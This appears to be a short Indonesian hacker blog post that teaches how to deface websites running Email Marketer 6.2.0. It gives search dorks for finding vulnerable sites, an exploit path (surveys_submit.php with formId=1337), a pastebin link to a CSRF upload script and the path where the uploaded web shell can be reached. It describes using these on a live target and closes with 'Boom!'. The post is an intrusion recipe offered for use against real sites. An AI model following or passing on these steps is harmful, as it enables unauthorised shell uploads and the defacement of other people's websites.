Oke kali ini saya akan membagikan cara deface poc Email Marketer 6.2.0.
Poc lama sih tapi web yang vuln bnyk :v.
Oke lanjut
--------------------------------------------
Bahan bahan :
1. Dork :
intext:"emailmarketer" + control; panel"
inurl:/emailmarketer/admin
( kembangin beb )
2. Exploit :
/surveys_submit.php?formId=1337
4.Csrf :
https://pastebin.com/28A2MFaE
3. Akses Shell :
/admin/temp/surveys/1337/(shell/sc name)
--------------------------------------------
Oke jadi di sini gua sudah mempunyai live target jadi langsung aja ya..
1. Ciri" vuln : Blank
Nah blank = vuln
2. Oke lanjut ke CSRF
Oiya gua di sini up sc aja ya..
3. Akses shell/sc
https://site.com/admin/temp/surveys/1337/(shell/sc)
4. Boom!
Oiya di script CSRF nya gambar dan target gua gk gnti, asli dari yang buat, klo ini gua recode dikit, tapi gua kasih yg aslinya :'v
Saya rasa cukup dan sampai sini saja yaa.. Byee <3
0 Komentar